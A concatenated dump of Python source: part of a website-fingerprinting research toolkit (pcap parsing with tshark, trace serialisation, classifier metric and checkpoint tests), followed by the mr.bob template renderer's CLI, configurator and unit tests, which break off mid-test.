"""Determines the IP address of the client from the sequence of packets.
Raises ClientIndeterminable on failure.
"""
# The client must of course be one of the senders
unique_ips = packets['ip.src'].unique()
candidates = [ip for ip in unique_ips if ip_address(ip) in client_subnet]
if not candidates:
# There were no IPs from the source in the subnet. This can happen
# due to tcpdump being overloaded and dropping packets. See if we can
# find the client IP in the destination IPs
unique_ips = set(unique_ips)
unique_ips.update(packets['ip.dst'].unique())
candidates = [ip for ip in unique_ips if ip_address(ip) in
client_subnet]
if not candidates:
raise ClientIndeterminable(
f"No source nor destination IPs were in the subnet: {unique_ips}.")
if len(candidates) > 1:
raise ClientIndeterminable(f"Too many client candidates {candidates}.")
return candidates[0]
def pcap_to_trace(
pcap: bytes, client_subnet: IPNetworkType,
display_filter: Optional[str] = None
) -> Tuple[Trace, pd.DataFrame]:
"""Converts a pcap to a packet trace."""
packets = load_pcap(pcap, str(client_subnet), display_filter)
if len(packets) == 0:
return [], packets
client = _determine_client_ip(packets, client_subnet)
packets['direction'] = Direction.OUT
packets['direction'] = packets['direction'].where(
packets['ip.src'] == client, Direction.IN)
zero_time = packets['frame.time_epoch'].iloc[0]
packets['frame.time_epoch'] = packets['frame.time_epoch'] - zero_time
trace = [Packet(*fields) for fields in zip(
packets['frame.time_epoch'], packets['direction'], packets['ip.len'])]
return trace, packets
def load_pcap(
pcap: bytes, client_subnet: str, display_filter: Optional[str] = None
) -> pd.DataFrame:
"""Load the pcap into a dataframe. Packets are filtered to those
with an endpoint in client_subnet.
"""
fields = ['frame.time_epoch', 'ip.src', 'ip.dst', 'ip.len', 'udp.stream',
'tcp.stream']
filter_ip = f'ip.src == {client_subnet} or ip.dst == {client_subnet}'
display_filter = (f'({filter_ip}) and ({display_filter})'
if display_filter else filter_ip)
command = ['tshark', '-r', '-', '-Y', display_filter,
'-Tfields', '-E', 'header=y', '-E', 'separator=,'] + list(
itertools.chain.from_iterable(('-e', field) for field in fields))
try:
result = subprocess.run(
command, input=pcap, check=True, capture_output=True)
except subprocess.CalledProcessError as err:
raise PcapParsingError(err.stderr.decode("utf-8").strip()) from err
return (pd.read_csv(io.BytesIO(result.stdout))
.sort_values(by='frame.time_epoch'))
TraceStats = TypedDict('TraceStats', {
'udp-flows': int, 'tcp-flows': int, 'udp-bytes': int, 'tcp-bytes': int
})
@dataclass
class TraceData:
"""Serialisable information pertaining to a traffic trace.
Attributes
----------
url :
The url fetched in the trace.
protocol :
The protocol associated with the trace.
connections :
        Counts of the number of 'udp' and 'tcp' flows in the trace, where each
        flow is identified by the IP-port 4-tuple, as well as the total bytes
        sent via UDP and TCP.
trace :
The encoded traffic trace
"""
url: str
protocol: str
connections: Optional[TraceStats]
trace: Trace
region: Optional[str] = None
def serialise(self) -> str:
"""Serialise the trace info to a string for writing to a file."""
return json.dumps(dataclasses.asdict(self))
@classmethod
def deserialise(cls, value: str) -> 'TraceData':
"""Deserialise a TraceData object from a string."""
data = json.loads(value)
data['trace'] = [Packet(*pkt) for pkt in data['trace']]
return cls(**data)
```
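A minimal round-trip sketch for the trace containers above (the URL, protocol label and byte counts are illustrative assumptions):
```python
from lab.trace import Direction, Packet, TraceData

trace = [Packet(0.0, Direction.OUT, 1200), Packet(0.05, Direction.IN, 1400)]
data = TraceData(
    url="https://example.com", protocol="Q043",
    connections={"udp-flows": 1, "tcp-flows": 0, "udp-bytes": 2600, "tcp-bytes": 0},
    trace=trace)

# serialise() emits JSON; deserialise() rebuilds Packet tuples from the lists.
restored = TraceData.deserialise(data.serialise())
assert restored.url == data.url and restored.trace == trace
```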
#### File: classifiers/kfingerprinting/test_metrics.py
```python
import pytest
from lab.classifiers.kfingerprinting import make_binary, false_positive_rate
@pytest.mark.parametrize('strict', [True, False])
def test_make_binary_simple(strict: bool):
"""It should convert unmonitored labels to -1 and monitored to 1."""
binary_true, binary_pred = make_binary(
y_true=['google.com', 'facebook.com', 'background'],
y_pred=['google.com', 'facebook.com', 'background'],
neg_label='background', strict=strict)
assert binary_true == binary_pred == [1, 1, -1]
def test_make_binary_no_strict():
"""It should treat each monitored page as equivalent."""
binary_true, binary_pred = make_binary(
y_true=['facebook.com', 'background', 'mail.google.com'],
y_pred=['facebook.com', 'background', 'pintrest.com'],
neg_label='background', strict=False)
assert binary_true == binary_pred == [1, -1, 1]
def test_make_binary_strict():
"""It should require predictions for monitored pages to be precise."""
binary_true, binary_pred = make_binary(
y_true=['facebook.com', 'background', 'mail.google.com', 'background'],
y_pred=['facebook.com', 'background', 'pintrest.com', 'google.com'],
neg_label='background', strict=True)
assert binary_true == [1, -1, 1, -1]
assert binary_pred == [1, -1, -1, 1]
def test_false_positive_rate():
"""It should correctly report the false positive rate."""
rate = false_positive_rate(y_true=[1, 1, -1, -1, -1, -1, -1],
y_pred=[1, -1, -1, 1, 1, -1, 1])
assert rate == 0.6
```
#### File: wf-tools/tests/test_fetch_checkpoint.py
```python
from collections import Counter
from lab.fetch_websites import filter_by_checkpoint, Result
def test_empty():
"""It should return the full sequence for no checkpoint."""
counter = {'Q043': 10, 'tcp': 20}
assert filter_by_checkpoint(
urls=['https://google.com', 'https://example.com'], checkpoint=[],
counter=counter
) == {
'https://google.com': counter.copy(),
'https://example.com': counter.copy()
}
counter = {'Q043': 1, 'tcp': 1}
assert filter_by_checkpoint(
urls=['https://mail.com', 'https://pie.com'], checkpoint=[],
counter=counter
) == {'https://mail.com': counter.copy(), 'https://pie.com': counter.copy()}
def make_result(**kwargs) -> Result:
"""Make a result with the provided keys and defaults for others.
"""
defaults: Result = {
'url': '', 'protocol': '', 'page_source': None, 'final_url': None,
'status': 'success', 'http_trace': [], 'packets': b''
}
defaults.update(kwargs) # type: ignore
return defaults
def test_existing_result():
"""It should filter out any results that already exist."""
urls = ['https://google.com', 'https://example.com']
counter = Counter({'Q043': 10, 'tcp': 20})
result = filter_by_checkpoint(urls=urls, counter=counter, checkpoint=[
make_result(url='https://google.com', protocol='tcp', status='success'),
make_result(url='https://example.com', protocol='Q043',
status='success')
])
assert result == {'https://google.com': (counter - Counter(tcp=1)),
'https://example.com': (counter - Counter(Q043=1))}
def test_no_negative_returns():
"""It should not return negative values."""
urls = ['https://google.com', 'https://example.com']
counter = Counter({'Q043': 1, 'tcp': 1})
result = filter_by_checkpoint(urls=urls, counter=counter, checkpoint=[
make_result(url='https://google.com', protocol='tcp', status='success'),
make_result(url='https://google.com', protocol='tcp', status='success')
])
assert result == {'https://google.com': Counter(Q043=1),
'https://example.com': counter.copy()}
def test_no_empty_returns():
"""It should not return urls that have no more protocols."""
urls = ['https://google.com', 'https://example.com']
counter = Counter({'Q043': 1, 'tcp': 1})
result = filter_by_checkpoint(urls=urls, counter=counter, checkpoint=[
make_result(url='https://google.com', protocol='tcp', status='success'),
make_result(url='https://google.com', protocol='Q043', status='success')
])
assert result == {'https://example.com': counter.copy()}
def test_check_sequential_failures():
"""If a url failed n times sequentially in the checkpoint,
it should not be returned.
"""
urls = ['https://a.com', 'https://b.com']
counter = Counter({'Q043': 1, 'tcp': 1})
result = filter_by_checkpoint(urls=urls, counter=counter, checkpoint=[
make_result(url='https://a.com', protocol='tcp', status='success'),
make_result(url='https://a.com', protocol='Q043', status='failure'),
make_result(url='https://a.com', protocol='Q043', status='timeout'),
make_result(url='https://a.com', protocol='Q043', status='failure')
], max_attempts=3)
assert result == {'https://b.com': counter.copy()}
def test_non_sequential_failures():
"""If a url failed n times non-sequentially in the checkpoint,
it is okay.
"""
urls = ['https://a.com', 'https://b.com']
counter = Counter({'Q043': 3, 'tcp': 3})
result = filter_by_checkpoint(urls=urls, counter=counter, checkpoint=[
make_result(url='https://a.com', protocol='tcp', status='success'),
make_result(url='https://a.com', protocol='Q043', status='failure'),
make_result(url='https://a.com', protocol='Q043', status='success'),
make_result(url='https://a.com', protocol='Q043', status='failure'),
make_result(url='https://a.com', protocol='Q043', status='success'),
make_result(url='https://a.com', protocol='Q043', status='failure')
], max_attempts=3)
assert result == {'https://a.com': (counter - Counter(tcp=1, Q043=2)),
'https://b.com': counter.copy()}
def test_no_success_max_failures():
"""It should correctly handle items which have only ever failed."""
checkpoint = [
make_result(url="https://www.a.com", protocol="Q043", status="failure"),
make_result(url="https://www.a.com", protocol="Q043", status="failure"),
make_result(url="https://www.a.com", protocol="Q043", status="failure"),
]
urls = ["https://www.a.com"]
version_ctr: Counter = Counter(Q043=1, Q046=1)
assert filter_by_checkpoint(urls, checkpoint, version_ctr) == Counter()
``` |
{
"source": "jpcw/mr.bob",
"score": 3
} |
#### File: mr.bob/mrbob/cli.py
```python
import pkg_resources
import sys
import os
import shutil
import six
import argparse
from .configurator import Configurator
from .configurator import maybe_bool
from .bobexceptions import ConfigurationError
from .bobexceptions import TemplateConfigurationError
from .parsing import parse_config, update_config, pretty_format_config
# http://docs.python.org/library/argparse.html
parser = argparse.ArgumentParser(description='Filesystem template renderer')
parser.add_argument('template',
nargs="?",
help="""Template name to use for rendering. See
http://mrbob.readthedocs.org/en/latest/userguide.html#usage
for a guide to template syntax
""")
parser.add_argument('-O', '--target-directory',
default=".",
dest="target_directory",
help='Where to output rendered structure. Defaults to current directory')
parser.add_argument('-v', '--verbose',
action="store_true",
default=False,
help='Print more output for debugging')
parser.add_argument('-c', '--config',
action="store",
help='Configuration file to specify either [mr.bob] or [variables] sections')
parser.add_argument('-V', '--version',
action="store_true",
default=False,
help='Display version number')
parser.add_argument('-l', '--list-questions',
action="store_true",
default=False,
help='List all questions needed for the template')
parser.add_argument('-w', '--remember-answers',
action="store_true",
default=False,
help='Remember answers to .mrbob.ini file inside output directory')
parser.add_argument('-n', '--non-interactive',
dest='non_interactive',
action='store_true',
default=False,
help="Don't prompt for input. Fail if questions are required but not answered")
parser.add_argument('-q', '--quiet',
action="store_true",
default=False,
help='Suppress all but necessary output')
def main(args=sys.argv[1:]):
"""Main function called by `mrbob` command.
"""
options = parser.parse_args(args=args)
if options.version:
version = pkg_resources.get_distribution('mr.bob').version
return version
if not options.template:
parser.error('You must specify what template to use.')
userconfig = os.path.expanduser('~/.mrbob')
if os.path.exists(userconfig):
global_config = parse_config(userconfig)
global_bobconfig = global_config['mr.bob']
global_variables = global_config['variables']
global_defaults = global_config['defaults']
else:
global_bobconfig = {}
global_variables = {}
global_defaults = {}
original_global_bobconfig = dict(global_bobconfig)
original_global_variables = dict(global_variables)
original_global_defaults = dict(global_defaults)
if options.config:
try:
file_config = parse_config(options.config)
except ConfigurationError as e:
parser.error(e)
file_bobconfig = file_config['mr.bob']
file_variables = file_config['variables']
file_defaults = file_config['defaults']
else:
file_bobconfig = {}
file_variables = {}
file_defaults = {}
cli_variables = {} # TODO: implement variables on cli
cli_defaults = {} # TODO: implement defaults on cli
cli_bobconfig = {
'verbose': options.verbose,
'quiet': options.quiet,
'remember_answers': options.remember_answers,
'non_interactive': options.non_interactive,
}
bobconfig = update_config(update_config(global_bobconfig, file_bobconfig), cli_bobconfig)
variables = update_config(update_config(global_variables, file_variables), cli_variables)
defaults = update_config(update_config(global_defaults, file_defaults), cli_defaults)
c = None
if bobconfig['verbose']:
print('')
print('Configuration provided:')
print('')
print('[variables] from ~/.mrbob')
for line in pretty_format_config(original_global_variables):
print(line)
print('[variables] from --config file')
for line in pretty_format_config(file_variables):
print(line)
# TODO: implement variables on cli
# print('[variables] from command line interface')
# for line in pretty_format_config(file_variables):
# print(line)
print('[defaults] from ~/.mrbob')
for line in pretty_format_config(original_global_defaults):
print(line)
print('[defaults] from --config file')
for line in pretty_format_config(file_defaults):
print(line)
# TODO: implement defaults on cli
# print('[defaults] from command line interface')
# for line in pretty_format_config(file_defaults):
# print(line)
print('[mr.bob] from ~/.mrbob')
for line in pretty_format_config(original_global_bobconfig):
print(line)
print('[mr.bob] from --config file')
for line in pretty_format_config(file_bobconfig):
print(line)
print('[mr.bob] from command line interface')
for line in pretty_format_config(cli_bobconfig):
print(line)
try:
c = Configurator(template=options.template,
target_directory=options.target_directory,
bobconfig=bobconfig,
variables=variables,
defaults=defaults)
if options.list_questions:
return c.print_questions()
if c.questions and not maybe_bool(bobconfig['quiet']):
if options.non_interactive:
print('')
print('Welcome to mr.bob non-interactive mode. Questions will be answered by default values or hooks.')
print('')
else:
print('')
print('Welcome to mr.bob interactive mode. Before we generate directory structure, some questions need to be answered.')
print('')
print('Answer with a question mark to display help.')
print('Values in square brackets at the end of the questions show the default value if there is no answer.')
print('\n')
c.ask_questions()
if not options.non_interactive:
print('')
c.render()
if not maybe_bool(bobconfig['quiet']):
print("Generated file structure at %s" % os.path.realpath(options.target_directory))
print('')
return
except TemplateConfigurationError as e:
parser.error(six.u('TemplateConfigurationError: %s') % e.args[0])
except ConfigurationError as e:
parser.error(six.u('ConfigurationError: %s') % e.args[0])
finally:
if c and c.is_tempdir:
shutil.rmtree(c.template_dir)
if __name__ == '__main__': # pragma: nocover
print(main())
```
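The CLI can also be driven programmatically through `main`; the sketch below lists the questions of one of the bundled test templates (template name taken from the test suite further down) without rendering anything.
```python
# Sketch: invoke the argument parser and Configurator without a shell.
from mrbob.cli import main

# --list-questions prints the template's [questions] section and returns.
main(['--list-questions', 'mrbob.tests:templates/questions1'])
```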
#### File: mr.bob/mrbob/configurator.py
```python
import os
import re
import sys
import readline
try: # pragma: no cover
from urllib import urlretrieve # NOQA
except ImportError: # pragma: no cover
# PY3K
from urllib.request import urlretrieve # NOQA
import tempfile
from zipfile import ZipFile, is_zipfile
readline # make pyflakes happy, readline makes interactive mode keep history
import six
from importlib import import_module
from .rendering import render_structure
from .parsing import (
parse_config,
write_config,
update_config,
pretty_format_config,
)
from .bobexceptions import (
ConfigurationError,
TemplateConfigurationError,
SkipQuestion,
ValidationError,
)
DOTTED_REGEX = re.compile(r'^[a-zA-Z_.]+:[a-zA-Z_.]+$')
def resolve_dotted_path(name):
module_name, dir_name = name.rsplit(':', 1)
module = import_module(module_name)
return os.path.join(os.path.dirname(module.__file__), dir_name)
def resolve_dotted_func(name):
module_name, func_name = name.split(':')
module = import_module(module_name)
func = getattr(module, func_name, None)
if func:
return func
else:
raise ConfigurationError("There is no object named %s in module %s" % (func_name, module_name))
def maybe_resolve_dotted_func(name):
if isinstance(name, six.string_types) and DOTTED_REGEX.match(name):
return resolve_dotted_func(name)
else:
return name
def maybe_bool(value):
if value == "True":
return True
if value == "False":
return False
else:
return value
def parse_template(template_name):
"""Resolve template name into absolute path to the template
and boolean if absolute path is temporary directory.
"""
if template_name.startswith('http'):
if '#' in template_name:
url, subpath = template_name.rsplit('#', 1)
else:
url = template_name
subpath = ''
with tempfile.NamedTemporaryFile() as tmpfile:
urlretrieve(url, tmpfile.name)
if not is_zipfile(tmpfile.name):
raise ConfigurationError("Not a zip file: %s" % tmpfile)
zf = ZipFile(tmpfile)
try:
path = tempfile.mkdtemp()
zf.extractall(path)
return os.path.join(path, subpath), True
finally:
zf.close()
if ':' in template_name:
path = resolve_dotted_path(template_name)
else:
path = os.path.realpath(template_name)
if not os.path.isdir(path):
raise ConfigurationError('Template directory does not exist: %s' % path)
return path, False
class Configurator(object):
"""Controller that figures out settings, asks questions and renders
the directory structure.
:param template: Template name
:param target_directory: Filesystem path to a output directory
:param bobconfig: Configuration for mr.bob behaviour
:param variables: Given variables to questions
    :param defaults: Overridden defaults of the questions
    In addition to the above settings, `Configurator` exposes the following attributes:
- :attr:`template_dir` is root directory of the template
- :attr:`is_tempdir` if template directory is temporary (when using zipfile)
- :attr:`templateconfig` dictionary parsed from `template` section
    - :attr:`questions` ordered list of `Question` instances to be asked
- :attr:`bobconfig` dictionary parsed from `mrbob` section of the config
"""
def __init__(self,
template,
target_directory,
bobconfig=None,
variables=None,
defaults=None):
if not bobconfig:
bobconfig = {}
if not variables:
variables = {}
if not defaults:
defaults = {}
self.variables = variables
self.defaults = defaults
self.target_directory = os.path.realpath(target_directory)
# figure out template directory
self.template_dir, self.is_tempdir = parse_template(template)
# check if user is trying to specify output dir into template dir
if self.template_dir in os.path.commonprefix([self.target_directory,
self.template_dir]):
raise ConfigurationError('You can not use target directory inside the template')
if not os.path.isdir(self.target_directory):
os.makedirs(self.target_directory)
# parse template configuration file
template_config = os.path.join(self.template_dir, '.mrbob.ini')
if not os.path.exists(template_config):
raise TemplateConfigurationError('Config not found: %s' % template_config)
self.config = parse_config(template_config)
# parse questions from template configuration file
self.raw_questions = self.config['questions']
if self.raw_questions:
self.questions = self.parse_questions(self.raw_questions, self.config['questions_order'])
else:
self.questions = []
# parse bobconfig settings
# TODO: move config resolution inside this function from cli.py
self.bobconfig = update_config(bobconfig, self.config['mr.bob'])
self.verbose = maybe_bool(self.bobconfig.get('verbose', False))
self.quiet = maybe_bool(self.bobconfig.get('quiet', False))
self.remember_answers = maybe_bool(self.bobconfig.get('remember_answers', False))
self.ignored_files = self.bobconfig.get('ignored_files', '').split()
self.ignored_directories = self.bobconfig.get('ignored_directories', '').split()
# parse template settings
self.templateconfig = self.config['template']
self.post_render = [resolve_dotted_func(f) for f in self.templateconfig.get('post_render', '').split()]
self.pre_render = [resolve_dotted_func(f) for f in self.templateconfig.get('pre_render', '').split()]
self.renderer = resolve_dotted_func(
self.templateconfig.get('renderer', 'mrbob.rendering:jinja2_renderer'))
def render(self):
"""Render file structure given instance configuration. Basically calls
:func:`mrbob.rendering.render_structure`.
"""
if self.pre_render:
for f in self.pre_render:
f(self)
render_structure(self.template_dir,
self.target_directory,
self.variables,
self.verbose,
self.renderer,
self.ignored_files,
self.ignored_directories)
if self.remember_answers:
write_config(os.path.join(self.target_directory, '.mrbob.ini'),
'variables',
self.variables)
if self.post_render:
for f in self.post_render:
f(self)
def parse_questions(self, config, order):
q = []
for question_key in order:
key_parts = question_key.split('.')
c = dict(config)
for k in key_parts:
c = c[k]
# filter out subnamespaces
c = dict([(k, v) for k, v in c.items() if not isinstance(v, dict)])
question = Question(name=question_key, **c)
q.append(question)
return q
def print_questions(self): # pragma: no cover
for line in pretty_format_config(self.raw_questions):
print(line)
# TODO: filter out lines without questions
        # TODO: separate questions with a newline
# TODO: keep order
def ask_questions(self):
"""Loops through questions and asks for input if variable is not yet set.
"""
        # TODO: if users want to manipulate questions order, this is currently not possible.
for question in self.questions:
if question.name not in self.variables:
self.variables[question.name] = question.ask(self)
class Question(object):
"""Question configuration. Parameters are used to configure questioning
and possible validation of the answer.
:param name: Unique, namespaced name of the question
:param question: Question to be asked
:param default: Default value of the question
:param required: Is question required?
:type required: bool
    :param command_prompt: Function executed to ask the question, given the question text
:param help: Optional help message
    :param pre_ask_question: Space-delimited functions in dotted notation to run before the question is asked
    :param post_ask_question: Space-delimited functions in dotted notation to run after the question is asked
    :param **extra: Any extra parameters stored for possible extension of `Question` functionality
    Any of the above parameters can be accessed as an attribute of the `Question` instance.
"""
def __init__(self,
name,
question,
default=None,
required=False,
command_prompt=six.moves.input,
pre_ask_question='',
post_ask_question='',
help="",
**extra):
self.name = name
self.question = question
self.default = default
self.required = maybe_bool(required)
self.command_prompt = maybe_resolve_dotted_func(command_prompt)
self.help = help
self.pre_ask_question = [resolve_dotted_func(f) for f in pre_ask_question.split()]
self.post_ask_question = [resolve_dotted_func(f) for f in post_ask_question.split()]
self.extra = extra
def __repr__(self):
return six.u("<Question name=%(name)s question='%(question)s'"
" default=%(default)s required=%(required)s>") % self.__dict__
def ask(self, configurator):
"""Eventually, ask the question.
:param configurator: :class:`mrbob.configurator.Configurator` instance
"""
correct_answer = None
self.default = configurator.defaults.get(self.name, self.default)
non_interactive = maybe_bool(configurator.bobconfig.get('non_interactive', False))
if non_interactive:
self.command_prompt = lambda x: ''
try:
while correct_answer is None:
# hook: pre ask question
for f in self.pre_ask_question:
try:
f(configurator, self)
except SkipQuestion:
return
# prepare question
if self.default:
question = six.u("--> %s [%s]: ") % (self.question, self.default)
else:
question = six.u("--> %s: ") % self.question
# ask question
if six.PY3: # pragma: no cover
answer = self.command_prompt(question).strip()
else: # pragma: no cover
answer = self.command_prompt(question.encode('utf-8')).strip().decode('utf-8')
# display additional help
if answer == "?":
if self.help:
print(self.help)
else:
print("There is no additional help text.")
continue
if answer:
correct_answer = answer
# if we don't have an answer, take default
elif self.default is not None:
correct_answer = maybe_bool(self.default)
# if we don't have an answer or default value and is required, reask
elif self.required and not correct_answer:
if non_interactive:
raise ConfigurationError('non-interactive mode: question %s is required but not answered.' % self.name)
else:
# TODO: we don't cover this as coverage seems to ignore it
continue # pragma: no cover
else:
correct_answer = answer
# hook: post ask question + validation
for f in self.post_ask_question:
try:
correct_answer = f(configurator, self, correct_answer)
except ValidationError as e:
if non_interactive:
raise ConfigurationError('non-interactive mode: question %s failed validation.' % self.name)
else:
correct_answer = None
print("ERROR: " + str(e))
continue
except KeyboardInterrupt: # pragma: no cover
print('\nExiting...')
sys.exit(0)
if not non_interactive:
print('')
return correct_answer
```
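To illustrate the question flow in isolation, the sketch below asks a single `Question` with a canned prompt function; the stub configurator mirrors the `DummyConfigurator` used in the test module that follows.
```python
# Sketch: Question.ask only needs an object exposing `defaults` and `bobconfig`.
from mrbob.configurator import Question

class StubConfigurator:
    defaults = {}
    bobconfig = {}

q = Question('author.name', 'Your name?',
             command_prompt=lambda prompt: 'Alice')  # canned answer, no terminal
print(q.ask(StubConfigurator()))  # -> 'Alice'
```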
#### File: mrbob/tests/test_configurator.py
```python
import unittest
import os
import sys
import tempfile
import shutil
import six
import mock
mocked_pre_ask_question = mock.Mock()
mocked_post_ask_question = mock.Mock()
mocked_post_ask_question_validationerror = mock.Mock()
mocked_post_ask_question_validationerror_non_interactive = mock.Mock()
mocked_render_hook = mock.Mock()
def dummy_prompt(value): # pragma: no cover
pass
def dummy_renderer(value): # pragma: no cover
pass
def dummy_question_hook(configurator, question): # pragma: no cover
return
def dummy_question_hook2(configurator, question): # pragma: no cover
return
def dummy_render_hook(configurator): # pragma: no cover
return
def dummy_question_hook_skipquestion(configurator, question): # pragma: no cover
from ..bobexceptions import SkipQuestion
raise SkipQuestion
class DummyConfigurator(object):
def __init__(self,
defaults=None,
bobconfig=None,
templateconfig=None,
variables=None,
quiet=False):
self.defaults = defaults or {}
self.bobconfig = bobconfig or {}
self.variables = variables or {}
self.quiet = quiet
self.templateconfig = templateconfig or {}
class resolve_dotted_pathTest(unittest.TestCase):
def call_FUT(self, name):
from ..configurator import resolve_dotted_path
return resolve_dotted_path(name)
def test_nomodule(self):
self.assertRaises(ImportError, self.call_FUT, 'foobar.blabla:foo')
def test_return_abs_path(self):
template_dir = os.path.join(os.path.dirname(__file__), 'templates')
abs_path = self.call_FUT('mrbob.tests:templates')
self.assertEquals(abs_path, template_dir)
class resolve_dotted_funcTest(unittest.TestCase):
def call_FUT(self, name):
from ..configurator import resolve_dotted_func
return resolve_dotted_func(name)
def test_nomodule(self):
self.assertRaises(ImportError, self.call_FUT, 'foobar.blabla:foo')
def test_error_no_func(self):
from ..bobexceptions import ConfigurationError
self.assertRaises(ConfigurationError, self.call_FUT, 'mrbob.rendering:foo')
def test_return_func(self):
from mrbob.rendering import jinja2_renderer
func = self.call_FUT('mrbob.rendering:jinja2_renderer')
self.assertEquals(func, jinja2_renderer)
class parse_templateTest(unittest.TestCase):
def call_FUT(self, name):
from ..configurator import parse_template
return parse_template(name)
def test_relative(self):
old_cwd = os.getcwd()
os.chdir(os.path.dirname(__file__))
template_dir = os.path.join(os.path.dirname(__file__), 'templates')
abs_path = self.call_FUT('templates')
os.chdir(old_cwd)
self.assertEqual(abs_path, (template_dir, False))
def test_absolute(self):
template_dir = os.path.join(os.path.dirname(__file__), 'templates')
abs_path = self.call_FUT(template_dir)
self.assertEqual(abs_path, (template_dir, False))
def test_dotted(self):
template_dir = os.path.join(os.path.dirname(__file__), 'templates')
abs_path = self.call_FUT('mrbob.tests:templates')
self.assertEqual(abs_path, (template_dir, False))
def test_not_a_dir(self):
from ..bobexceptions import ConfigurationError
self.assertRaises(ConfigurationError, self.call_FUT, 'foo_bar')
@mock.patch('mrbob.configurator.urlretrieve')
def test_zipfile(self, mock_urlretrieve):
mock_urlretrieve.side_effect = self.fake_zip
abs_path = self.call_FUT('http://foobar.com/bla.zip')
self.assertEqual(set(os.listdir(abs_path[0])),
set(['test', '.mrbob.ini']))
@mock.patch('mrbob.configurator.urlretrieve')
def test_zipfile_base_path(self, mock_urlretrieve):
mock_urlretrieve.side_effect = self.fake_zip_base_path
abs_path = self.call_FUT('http://foobar.com/bla.zip#some/dir')
self.assertEqual(set(os.listdir(abs_path[0])),
set(['test', '.mrbob.ini']))
@mock.patch('mrbob.configurator.urlretrieve')
def test_zipfile_not_zipfile(self, mock_urlretrieve):
from ..bobexceptions import ConfigurationError
mock_urlretrieve.side_effect = self.fake_wrong_zip
self.assertRaises(ConfigurationError, self.call_FUT, 'http://foobar.com/bla.tar#some/dir')
def fake_wrong_zip(self, url, path):
with open(path, 'w') as f:
f.write('boo')
def fake_zip(self, url, path):
import zipfile
zf = zipfile.ZipFile(path, 'w')
try:
zf.writestr('.mrbob.ini', '[questions]\n')
zf.writestr('test', 'test')
finally:
zf.close()
def fake_zip_base_path(self, url, path):
import zipfile
zf = zipfile.ZipFile(path, 'w')
try:
zf.writestr('some/dir/.mrbob.ini', '[questions]\n')
zf.writestr('some/dir/test', 'test')
finally:
zf.close()
class ConfiguratorTest(unittest.TestCase):
def setUp(self):
self.target_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.target_dir)
def call_FUT(self, *args, **kw):
from ..configurator import Configurator
return Configurator(*args, **kw)
def test_target_directory_inside_template_dir(self):
from ..bobexceptions import ConfigurationError
self.assertRaises(ConfigurationError,
self.call_FUT,
'mrbob.tests:templates/questions1',
os.path.join(os.path.dirname(__file__), 'templates/questions1/foo'),
{})
def test_parse_questions_basic(self):
c = self.call_FUT('mrbob.tests:templates/questions1',
self.target_dir,
{})
self.assertEqual(len(c.questions), 2)
self.assertEqual(c.questions[0].name, 'foo.bar.car.dar')
self.assertEqual(c.questions[0].question, 'Why?')
self.assertEqual(c.questions[1].name, 'foo')
self.assertEqual(c.questions[1].question, 'What?')
def test_parse_questions_no_questions(self):
c = self.call_FUT('mrbob.tests:templates/questions2',
self.target_dir,
{})
self.assertEqual(len(c.questions), 0)
def test_parse_questions_no_questions_section(self):
self.call_FUT('mrbob.tests:templates/empty2',
self.target_dir,
{})
def test_parse_questions_extra_parameter(self):
c = self.call_FUT(
'mrbob.tests:templates/questions3',
self.target_dir,
{})
self.assertEqual(c.questions[0].extra, {'foobar': 'something'})
def test_parse_questions_all(self):
c = self.call_FUT('mrbob.tests:templates/questions4',
self.target_dir,
{})
self.assertEqual(len(c.questions), 1)
self.assertEqual(c.questions[0].name, six.u('foo'))
self.assertEqual(c.questions[0].default, "True")
self.assertEqual(c.questions[0].required, False)
self.assertEqual(c.questions[0].help, six.u('Blabla blabal balasd a a sd'))
self.assertEqual(c.questions[0].command_prompt, dummy_prompt)
def test_ask_questions_empty(self):
args = ['mrbob.tests:templates/questions1',
self.target_dir,
{}]
c = self.call_FUT(*args)
c.questions = []
c.variables = {}
c.ask_questions()
self.assertEquals(c.variables, {})
def test_ask_questions_missing(self):
from ..configurator import Question
args = ['mrbob.tests:templates/questions1',
self.target_dir,
{}]
c = self.call_FUT(*args)
c.questions = [Question('foo.bar', 'fobar?'), Question('moo', "Moo?", command_prompt=lambda x: 'moo.')]
c.variables = {'foo.bar': 'answer'}
c.ask_questions()
self.assertEquals(c.variables, {'foo.bar': 'answer', 'moo': 'moo.'})
@mock.patch('mrbob.configurator.render_structure')
def test_remember_answers(self, mock_render_structure):
args = ['mrbob.tests:templates/questions1',
self.target_dir,
{'remember_answers': 'True'},
{'foo.bar': '3'}]
c = self.call_FUT(*args)
c.render()
with open(os.path.join(self.target_dir, '.mrbob.ini')) as f:
self.assertEquals(f.read().strip(), """[variables]\nfoo.bar = 3""".strip())
@mock.patch('mrbob.configurator.render_structure')
def test_remember_answers_default(self, mock_render_structure):
c = self.call_FUT(
'mrbob.tests:templates/questions1',
self.target_dir,
variables={'foo.bar': '3'},
)
c.render()
self.assertFalse(os.path.exists(os.path.join(self.target_dir, '.mrbob.ini')))
def test_renderer_default(self):
from ..rendering import jinja2_renderer
c = self.call_FUT('mrbob.tests:templates/empty',
self.target_dir,
{})
self.assertEqual(c.renderer, jinja2_renderer)
def test_renderer_set(self):
c = self.call_FUT('mrbob.tests:templates/renderer',
self.target_dir,
{})
self.assertEqual(c.renderer, dummy_renderer)
def test_pre_post_render_hooks_multiple(self):
c = self.call_FUT(
'mrbob.tests:templates/render_hooks',
self.target_dir,
{},
)
self.assertEqual(c.pre_render, [dummy_render_hook, mocked_render_hook])
self.assertEqual(c.post_render, [dummy_render_hook, mocked_render_hook])
c.render()
self.assertEqual(mocked_render_hook.mock_calls, [mock.call(c), mock.call(c)])
def test_ignored_files(self):
c = self.call_FUT('mrbob.tests:templates/ignored',
self.target_dir,
{})
self.assertEqual(len(c.ignored_files), 2)
self.assertTrue('ignored' in c.ignored_files)
self.assertTrue('*.txt' in c.ignored_files)
def test_ignored_directories(self):
c = self.call_FUT('mrbob.tests:templates/ignored_dirs',
self.target_dir,
{})
self.assertEqual(len(c.ignored_directories), 2)
self.assertTrue('ignored' in c.ignored_directories)
self.assertTrue('*_stuff' in c.ignored_directories)
class QuestionTest(unittest.TestCase):
def call_FUT(self, *args, **kw):
from ..configurator import Question
return Question(*args, **kw)
def test_defaults(self):
from six import moves
q = self.call_FUT('foo', 'Why?')
self.assertEqual(q.name, 'foo')
self.assertEqual(q.default, None)
self.assertEqual(q.required, False)
self.assertEqual(q.help, "")
self.assertEqual(q.command_prompt, moves.input)
def test_repr(self):
q = self.call_FUT('foo', 'Why?')
self.assertEqual(repr(q), six.u("<Question name=foo question='Why?' default=None required=False>"))
def test_ask(self):
def cmd(q):
